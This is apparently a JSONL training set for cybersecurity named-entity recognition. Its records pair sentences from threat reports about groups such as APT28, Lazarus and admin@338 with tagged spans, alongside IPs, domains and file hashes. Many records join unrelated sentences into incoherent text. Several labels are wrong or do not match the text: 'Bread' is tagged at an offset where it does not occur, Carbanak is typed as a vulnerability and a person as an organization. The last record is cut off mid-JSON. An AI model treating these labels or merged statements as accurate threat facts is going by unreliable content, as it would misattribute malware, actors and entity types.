Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" . Finally the driver is started using the ZwLoadDriver native API . Most of the time , unsolicited messages from various people are the first entry point .", "spans": {"MALWARE: Bread": [[82, 87]], "ORGANIZATION: Google": [[289, 295]]}, "info": {"id": "cyberner_stix_train_000713", "source": "cyberner_stix_train"}} {"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications . The first attack started in early July with a ShimRatReporter payload . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "MALWARE: EventBot": [[49, 57]], "MALWARE: ShimRatReporter": [[264, 279]], "ORGANIZATION: individual": [[312, 322]], "THREAT_ACTOR: actors": [[336, 342]]}, "info": {"id": "cyberner_stix_train_000714", "source": "cyberner_stix_train"}} {"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can ’ t do anything else . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan . consecutive if-statement flattened blocks ) FULLHOUSE.DOORED ( com.docker.vmnat , npx - cli , us.zoom . 
ZoomUpdate )", "spans": {"THREAT_ACTOR: Gorgon Group": [[203, 215]], "ORGANIZATION: governmental organizations": [[258, 284]], "TOOL: FULLHOUSE.DOORED": [[357, 373]]}, "info": {"id": "cyberner_stix_train_000715", "source": "cyberner_stix_train"}} {"text": "Named pipes are a Windows inter-process communication method .", "spans": {"SYSTEM: Windows": [[18, 25]]}, "info": {"id": "cyberner_stix_train_000716", "source": "cyberner_stix_train"}} {"text": "When reviewing network perimeter logs for the IP S-PROT addresses , organizations may find numerous instances of these IP S-PROT addresses attempting to connect to their systems .", "spans": {"TOOL: IP S-PROT addresses": [[46, 65], [119, 138]]}, "info": {"id": "cyberner_stix_train_000717", "source": "cyberner_stix_train"}} {"text": "The most recent version of Ginp ( at the time of writing ) was detected at the end of November 2019 . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": {"MALWARE: Ginp": [[27, 31]], "THREAT_ACTOR: APT10": [[128, 133]], "ORGANIZATION: U.S. 
law firm": [[150, 163]], "ORGANIZATION: apparel company": [[185, 200]], "ORGANIZATION: AutoFocus": [[265, 274]], "MALWARE: Daserf": [[317, 323]], "MALWARE: 9002": [[348, 352]], "MALWARE: Invader": [[357, 364]]}, "info": {"id": "cyberner_stix_train_000718", "source": "cyberner_stix_train"}} {"text": "To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: CTU": [[97, 100]], "FILEPATH: cmd.exe": [[122, 129]]}, "info": {"id": "cyberner_stix_train_000719", "source": "cyberner_stix_train"}} {"text": "Downeks can be instructed with the “ img ” command to capture the victim screen and transmit it back to the C2 .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: the “ img ” command": [[31, 50]], "TOOL: C2": [[108, 110]]}, "info": {"id": "cyberner_stix_train_000720", "source": "cyberner_stix_train"}} {"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . DUDELL : File Type :M icrosoft Excel 97 – I-TOO 2 E-IDTY003 Document . By monitoring for indicators of compromise , organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks in earlier stages .", "spans": {"TOOL: DustySky": [[92, 100]], "THREAT_ACTOR: Molerats": [[147, 155]], "THREAT_ACTOR: Gaza cybergang": [[164, 178]], "THREAT_ACTOR: terrorist group": [[187, 202]], "MALWARE: DUDELL": [[269, 275]], "TOOL: :M icrosoft Excel 97": [[288, 308]]}, "info": {"id": "cyberner_stix_train_000721", "source": "cyberner_stix_train"}} {"text": "It protects itself from deletion by requesting Device Administrator rights during the installation . 
The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims . Remote desktop . Organizations can validate their security controls using the following actions with Mandiant Security Validation .", "spans": {"TOOL: VPS": [[138, 141]], "TOOL: Remote desktop": [[218, 232]]}, "info": {"id": "cyberner_stix_train_000722", "source": "cyberner_stix_train"}} {"text": "mobile_treats_2013_04s The number of mobile banking Trojans in our collection Mobile banking Trojans can run together with Win-32 Trojans to bypass the two-factor authentication – mTAN theft ( the theft of banking verification codes that banks send their customers in SMS messages ) . which has been active since at least 2011 . The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"SYSTEM: Win-32": [[123, 129]], "MALWARE: Winnti": [[333, 339]], "TOOL: C&C": [[412, 415]]}, "info": {"id": "cyberner_stix_train_000723", "source": "cyberner_stix_train"}} {"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": {"THREAT_ACTOR: Fxmsp": [[127, 132]]}, "info": {"id": "cyberner_stix_train_000724", "source": "cyberner_stix_train"}} {"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves are written in Italian . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks . Download binary disguised has a picture from Google Drive and execute it . 
For example , the government was credited with leading a multicountry operation to hack the ransomware group REvil , forcing it offline .", "spans": {"SYSTEM: Play Store": [[11, 21]], "TOOL: Clayslide documents": [[152, 171]], "TOOL: Google Drive": [[297, 309]], "ORGANIZATION: government": [[345, 355]], "THREAT_ACTOR: ransomware group REvil": [[419, 441]]}, "info": {"id": "cyberner_stix_train_000725", "source": "cyberner_stix_train"}} {"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . APT33 : 188.165.4.81 svcexplores.com . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)—including the leak of nearly 10 million drivers ' licenses — to the University of Rochester and multiple corporations .", "spans": {"SYSTEM: Android": [[67, 74]], "ORGANIZATION: Microsoft": [[140, 149]], "VULNERABILITY: SMBv1 vulnerabilities": [[164, 185]], "THREAT_ACTOR: APT33": [[234, 239]], "IP_ADDRESS: 188.165.4.81": [[242, 254]], "DOMAIN: svcexplores.com": [[255, 270]], "TOOL: MOVEit": [[277, 283]], "ORGANIZATION: University of Rochester": [[478, 501]], "ORGANIZATION: multiple corporations": [[506, 527]]}, "info": {"id": "cyberner_stix_train_000726", "source": "cyberner_stix_train"}} {"text": "Some attacker tools were used to almost exclusively target organizations within APAC . 
It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: attacker": [[5, 13]], "THREAT_ACTOR: TG-3390": [[101, 108]], "ORGANIZATION: data center employees": [[136, 157]]}, "info": {"id": "cyberner_stix_train_000727", "source": "cyberner_stix_train"}} {"text": "On the 12th of February 2013 , FireEye published a blogpost alerting readers to a combination of new Adobe Reader 0-day vulnerabilities , CVE-2013-0640 and CVE-2013-0641 , that were being actively exploited in the wild . 8 days after FireEye ’s initial alert , Kaspersky spotted the same exploit being used to spread an entirely different malware family from the one mentioned in the original report .", "spans": {"ORGANIZATION: FireEye": [[31, 38], [234, 241]], "TOOL: Adobe Reader": [[101, 113]], "VULNERABILITY: 0-day": [[114, 119]], "VULNERABILITY: CVE-2013-0640": [[138, 151]], "VULNERABILITY: CVE-2013-0641": [[156, 169]], "ORGANIZATION: Kaspersky": [[261, 270]]}, "info": {"id": "cyberner_stix_train_000728", "source": "cyberner_stix_train"}} {"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
\" With our latest research we now see how Greenbug has shifted aACT from HTTP-based C2 communication with Ismdoor .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash exploits": [[136, 150]], "TOOL: C2": [[253, 255]], "MALWARE: Ismdoor": [[275, 282]]}, "info": {"id": "cyberner_stix_train_000729", "source": "cyberner_stix_train"}} {"text": "The unused command above appears to be related to previous attacks , specifically attacks that occurred in November 2017 as discussed by McAfee and ESET .", "spans": {"ORGANIZATION: McAfee": [[137, 143]], "ORGANIZATION: ESET": [[148, 152]]}, "info": {"id": "cyberner_stix_train_000730", "source": "cyberner_stix_train"}} {"text": "The most affected countries were India , Brazil , and Indonesia . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It decodes the binary and writes it to a Java temporary directory with name “ ntuser.bin ” .", "spans": {"ORGANIZATION: SPEAR": [[66, 71]], "TOOL: PassCV samples": [[90, 104]], "TOOL: RAT": [[165, 168]], "TOOL: Netwire": [[176, 183]], "THREAT_ACTOR: TG-0416": [[186, 193]]}, "info": {"id": "cyberner_stix_train_000731", "source": "cyberner_stix_train"}} {"text": "Initial phase During this phase , the Trojan tries to gain root rights on the device and to install some modules . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . 
Some Brazilian criminals tout credit card data extracted from a hotel ’s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": {"THREAT_ACTOR: Brazilian criminals": [[392, 411]]}, "info": {"id": "cyberner_stix_train_000732", "source": "cyberner_stix_train"}} {"text": "The two components are dropped from the following URLs respectively :", "spans": {}, "info": {"id": "cyberner_stix_train_000733", "source": "cyberner_stix_train"}} {"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": {"TOOL: WCry": [[0, 4]], "TOOL: RSA": [[31, 34]], "TOOL: AES": [[39, 42]], "MALWARE: date code": [[116, 125]], "MALWARE: Trojan": [[281, 287]]}, "info": {"id": "cyberner_stix_train_000734", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 74.63.195.236 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 74.63.195.236": [[10, 23]]}, "info": {"id": "cyberner_stix_train_000735", "source": "cyberner_stix_train"}} {"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]], "TOOL: publicly available RATs": [[36, 59]]}, "info": {"id": "cyberner_stix_train_000737", "source": "cyberner_stix_train"}} {"text": "The domain ‘ addroider [ . 
The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": {"THREAT_ACTOR: Lazarus Group": [[31, 44]], "ORGANIZATION: economic": [[299, 307]]}, "info": {"id": "cyberner_stix_train_000738", "source": "cyberner_stix_train"}} {"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable . However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": {"THREAT_ACTOR: admin@338": [[146, 155]], "ORGANIZATION: government": [[230, 240]], "ORGANIZATION: think tank": [[283, 293]], "TOOL: Excel": [[364, 369]], "TOOL: Word": [[374, 378]], "THREAT_ACTOR: fraudsters": [[508, 518]]}, "info": {"id": "cyberner_stix_train_000739", "source": "cyberner_stix_train"}} {"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . 
A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of threats that could compromise intangible assets . It is foreseeable that an organization such as the Earth Liberation Front ELF may attempt an attack to make a political or social statement while the same organization could be targeted by an adversarial nation state in an attempt to steal intellectual property .", "spans": {"ORGANIZATION: U.S.-based defense": [[345, 363]], "ORGANIZATION: aerospace technologies": [[449, 471]], "ORGANIZATION: combat processes": [[474, 490]], "ORGANIZATION: naval defense systems": [[497, 518]], "TOOL: next-generation intrusion prevention system": [[629, 672]], "TOOL: NGIPS": [[675, 680]], "ORGANIZATION: the Earth Liberation Front ELF": [[826, 856]], "THREAT_ACTOR: adversarial nation state": [[971, 995]]}, "info": {"id": "cyberner_stix_train_000740", "source": "cyberner_stix_train"}} {"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"MALWARE: Rotexy": [[86, 92]], "TOOL: LOWBALL malware": [[111, 126]], "THREAT_ACTOR: admin@338": [[167, 176]], "MALWARE: upload.bat": [[203, 213]], "ORGANIZATION: US-CERT Code Analysis Team": [[333, 359]], "FILEPATH: botnet controller": [[369, 386]]}, "info": {"id": "cyberner_stix_train_000741", "source": "cyberner_stix_train"}} {"text": "In fact , the applications are designed to download the autorun.inf file , an icon file and the win32-Trojan file , which the mobile malicious program locates in the root directory of an SD card . 
Execute a command through exploits for CVE-2017-11882 . Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti . The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm .", "spans": {"SYSTEM: win32-Trojan": [[96, 108]], "SYSTEM: SD card": [[187, 194]], "VULNERABILITY: CVE-2017-11882": [[236, 250]], "MALWARE: ShadowPad": [[327, 336]], "MALWARE: Winnti": [[341, 347]]}, "info": {"id": "cyberner_stix_train_000742", "source": "cyberner_stix_train"}} {"text": "Coralco Tech is an organization located in Cyprus and providing interception tools . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . The Base64 blob is of particular interest . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": {"ORGANIZATION: Coralco Tech": [[0, 12]], "TOOL: Trojan": [[263, 269]], "TOOL: Lurk": [[277, 281]], "SYSTEM: The HyperText Transfer Protocol ( HTTP )": [[328, 368]]}, "info": {"id": "cyberner_stix_train_000743", "source": "cyberner_stix_train"}} {"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . 
This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"THREAT_ACTOR: actors": [[36, 42]], "TOOL: DLL": [[205, 208], [253, 256]], "FILEPATH: ASPNET_FILTER.DLL": [[211, 228]], "FILEPATH: ASP.NET ISAPI Filter": [[265, 285]]}, "info": {"id": "cyberner_stix_train_000744", "source": "cyberner_stix_train"}} {"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "VULNERABILITY: CVE-2016-4117": [[35, 48]], "THREAT_ACTOR: PROMETHIUM": [[67, 77]], "ORGANIZATION: Kazuar": [[147, 153]]}, "info": {"id": "cyberner_stix_train_000745", "source": "cyberner_stix_train"}} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "ORGANIZATION: consumer": [[76, 84]], "TOOL: Carberp": [[176, 183]], "ORGANIZATION: Kaspersky Lab": [[186, 199]], "TOOL: flash": [[282, 287]], "VULNERABILITY: exploit": [[288, 295]], "VULNERABILITY: CVE-2015-5119": [[298, 311]]}, "info": {"id": "cyberner_stix_train_000746", "source": "cyberner_stix_train"}} {"text": "Together , during the latter half of 2018 , we worked to remove the apps from the Play store while it was being deployed in the wild . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . 
However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": {"SYSTEM: Play store": [[82, 92]], "VULNERABILITY: CVE-2018-4878": [[174, 187]], "THREAT_ACTOR: attacker": [[200, 208]], "THREAT_ACTOR: MuddyWater": [[283, 293]]}, "info": {"id": "cyberner_stix_train_000747", "source": "cyberner_stix_train"}} {"text": "This is odd because attackers almost never set up an actual webpage on adversary C2 infrastructure .", "spans": {"TOOL: C2": [[81, 83]]}, "info": {"id": "cyberner_stix_train_000748", "source": "cyberner_stix_train"}} {"text": "Moreover , there are many toolkits like the SpyNote Trojan builder that enable users to build malware with ease and few clicks . The hackers will map a company’s network and look for strategically favorable locations for placing their malware . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"MALWARE: SpyNote": [[44, 51]], "THREAT_ACTOR: hackers": [[133, 140]], "THREAT_ACTOR: CopyKittens": [[276, 287]], "MALWARE: Metasploit": [[292, 302]], "VULNERABILITY: exploit": [[378, 385]], "MALWARE: Mimikatz": [[425, 433]], "MALWARE: Empire": [[500, 506]], "MALWARE: PowerShell": [[511, 521]], "TOOL: Python": [[526, 532]]}, "info": {"id": "cyberner_stix_train_000749", "source": "cyberner_stix_train"}} {"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) . When we first encountered Lurk , in 2011 , it was a nameless Trojan . Opening the .PDF file drops and executes a malware in a victim ’s system . 
We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"SYSTEM: Android": [[18, 25]], "SYSTEM: iOS": [[28, 31]], "SYSTEM: Windows": [[36, 43]], "TOOL: Lurk": [[99, 103]], "FILEPATH: .PDF": [[155, 159]], "MALWARE: SocGholish": [[238, 248]]}, "info": {"id": "cyberner_stix_train_000750", "source": "cyberner_stix_train"}} {"text": "Russia , like many nations , has long viewed success in the Olympic Games as a source of national prestige and soft power on the world stage .", "spans": {}, "info": {"id": "cyberner_stix_train_000751", "source": "cyberner_stix_train"}} {"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform .", "spans": {"ORGANIZATION: FireEye": [[126, 133]], "FILEPATH: Ploutus": [[194, 201]], "FILEPATH: Ploutus-D": [[211, 220]]}, "info": {"id": "cyberner_stix_train_000752", "source": "cyberner_stix_train"}} {"text": "] com or hxxp : //apple-icloud [ . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 . After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without . 
Apropos of my retrospective report , Bullock found that a great many messages in Biderman ’s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": {"THREAT_ACTOR: PLA Unit 61398": [[84, 98], [118, 132]], "THREAT_ACTOR: APT1": [[136, 140]], "MALWARE: Glimpse": [[185, 192]], "TOOL: GUID": [[331, 335]], "ORGANIZATION: Bullock": [[383, 390]], "ORGANIZATION: Ashley Madison employee": [[503, 526]], "ORGANIZATION: William Brewster Harrison": [[533, 558]]}, "info": {"id": "cyberner_stix_train_000753", "source": "cyberner_stix_train"}} {"text": "One of the most impressive features of this malware is its resilience . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"THREAT_ACTOR: APT10": [[72, 77]], "TOOL: MSP networks": [[176, 188]], "ORGANIZATION: customers": [[210, 219]], "THREAT_ACTOR: OceanLotus": [[270, 280]], "FILEPATH: ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f": [[283, 347]]}, "info": {"id": "cyberner_stix_train_000754", "source": "cyberner_stix_train"}} {"text": "On the other hand , it ’ s extremely easy for the crooks to re-direct communications to another freshly created account , ” explains Štefanko . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . 
Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": {"THREAT_ACTOR: Scattered Canary": [[239, 255]], "THREAT_ACTOR: Lazarus": [[361, 368]], "ORGANIZATION: Sony Pictures Entertainment": [[466, 493]]}, "info": {"id": "cyberner_stix_train_000755", "source": "cyberner_stix_train"}} {"text": "One of the more prolific actors that we track - referred to as TA505 - is responsible for the largest malicious spam campaigns we have ever observed , distributing instances of the Dridex banking Trojan , Locky ransomware , Jaff ransomware , The Trick banking Trojan , and several others in very high volumes .", "spans": {"THREAT_ACTOR: TA505": [[63, 68]], "MALWARE: Dridex": [[181, 187]], "MALWARE: Trojan": [[196, 202], [260, 266]], "MALWARE: Locky": [[205, 210]], "MALWARE: Jaff": [[224, 228]], "MALWARE: Trick": [[246, 251]]}, "info": {"id": "cyberner_stix_train_000756", "source": "cyberner_stix_train"}} {"text": "The attackers may have also downloaded and installed additional tools to penetrate the network further .", "spans": {}, "info": {"id": "cyberner_stix_train_000757", "source": "cyberner_stix_train"}} {"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a “ kill switch ” that can remotely eliminate the malware from a mobile device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . 
The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"THREAT_ACTOR: Emissary Panda": [[393, 407]], "FILEPATH: Seminar-Invitation.doc": [[458, 480]], "TOOL: Microsoft Word": [[504, 518]], "MALWARE: ThreeDollars": [[540, 552]]}, "info": {"id": "cyberner_stix_train_000758", "source": "cyberner_stix_train"}} {"text": "to eSurv S.R.L . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"ORGANIZATION: eSurv S.R.L .": [[3, 16]], "MALWARE: Microsoft Word documents": [[81, 105]], "VULNERABILITY: CVE-2017-0199": [[117, 130]], "THREAT_ACTOR: TEMP.Zagros": [[163, 174]], "ORGANIZATION: Palo Alto Networks": [[189, 207]], "ORGANIZATION: Trend Micro": [[212, 223]], "THREAT_ACTOR: actor": [[242, 247]]}, "info": {"id": "cyberner_stix_train_000759", "source": "cyberner_stix_train"}} {"text": "Based on the timeline , it appears that the actors were actively developing several of the loaders at the same time from 2009 until the early months of 2014 . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: actors": [[44, 50]], "THREAT_ACTOR: Lotus Blossom": [[183, 196]], "ORGANIZATION: individual": [[231, 241]]}, "info": {"id": "cyberner_stix_train_000760", "source": "cyberner_stix_train"}} {"text": "Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . 
In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"ORGANIZATION: Mandiant": [[17, 25]], "TOOL: emails": [[176, 182]], "ORGANIZATION: government officials": [[197, 217]], "FILEPATH: malicious Microsoft Word document": [[259, 292]], "VULNERABILITY: CVE-2012-0158": [[312, 325]]}, "info": {"id": "cyberner_stix_train_000761", "source": "cyberner_stix_train"}} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": {"THREAT_ACTOR: DUKES": [[4, 9]]}, "info": {"id": "cyberner_stix_train_000762", "source": "cyberner_stix_train"}} {"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ . Hackers usually take precautions , which experts refer to as Opsec . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": {"SYSTEM: DroidVPN": [[166, 174], [205, 213]], "MALWARE: HenBox": [[198, 204]], "THREAT_ACTOR: Hackers": [[240, 247]], "ORGANIZATION: FireEye": [[350, 357]], "THREAT_ACTOR: admin@338": [[460, 469]]}, "info": {"id": "cyberner_stix_train_000763", "source": "cyberner_stix_train"}} {"text": "The document was not the only one discovered in the recent attack waves .", "spans": {}, "info": {"id": "cyberner_stix_train_000764", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-wqu [ . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . 
Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is . More information TunnelVision has been observed exploiting Fortinet FortiOS CVE201813379 , Microsoft Exchange ProxyShell and the recent Log4Shell vulnerabilities .", "spans": {"THREAT_ACTOR: APT28": [[34, 39]], "ORGANIZATION: military": [[189, 197]], "ORGANIZATION: government": [[202, 212]], "VULNERABILITY: FortiOS CVE201813379": [[566, 586]], "VULNERABILITY: Microsoft Exchange ProxyShell": [[589, 618]], "VULNERABILITY: Log4Shell": [[634, 643]]}, "info": {"id": "cyberner_stix_train_000765", "source": "cyberner_stix_train"}} {"text": "In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[14, 27]], "ORGANIZATION: minority groups": [[83, 98]], "ORGANIZATION: supporters": [[116, 126]], "THREAT_ACTOR: group": [[179, 184]], "ORGANIZATION: anti-terrorist organizations": [[236, 264]], "MALWARE: Carbanak": [[267, 275]], "ORGANIZATION: consumer": [[343, 351]], "MALWARE: Carberp": [[443, 450]]}, "info": {"id": "cyberner_stix_train_000766", "source": "cyberner_stix_train"}} {"text": "Attackers can point and click their way through a compromised network and exfiltrate data . 
The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "cyberner_stix_train_000767", "source": "cyberner_stix_train"}} {"text": "According to slide 22 , \" CSEC assesses , with moderate certainty , SNOWGLOBE to be a state-sponsored Cyber Network Operation effort , put forth by a French intelligence agency \" . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": {"FILEPATH: malicious documents": [[210, 229]], "VULNERABILITY: CVE-2017-0199": [[241, 254]], "MALWARE: LATENTBOT": [[280, 289]], "MALWARE: malware": [[290, 297]]}, "info": {"id": "cyberner_stix_train_000768", "source": "cyberner_stix_train"}} {"text": "They also relied on Nbtscan , net user , and ping commands to obtain insights and identify opportunities for lateral movement .", "spans": {}, "info": {"id": "cyberner_stix_train_000769", "source": "cyberner_stix_train"}} {"text": "JULY 2015 , APT28 used two domains ( nato-news.com and bbc-news.org ) to host an Adobe Flash zero-day exploit to target NATO , the Afghan Ministry of Foreign Affairs , and the Pakistani military .", "spans": {"THREAT_ACTOR: APT28": [[12, 17]], "DOMAIN: nato-news.com": [[37, 50]], "DOMAIN: bbc-news.org": [[55, 67]], "ORGANIZATION: Adobe": [[81, 86]], "TOOL: Flash": [[87, 92]], "VULNERABILITY: zero-day": [[93, 101]], "ORGANIZATION: NATO": [[120, 124]], "ORGANIZATION: Afghan Ministry of Foreign Affairs": [[131, 165]], "ORGANIZATION: Pakistani military": [[176, 194]]}, "info": {"id": "cyberner_stix_train_000770", "source": 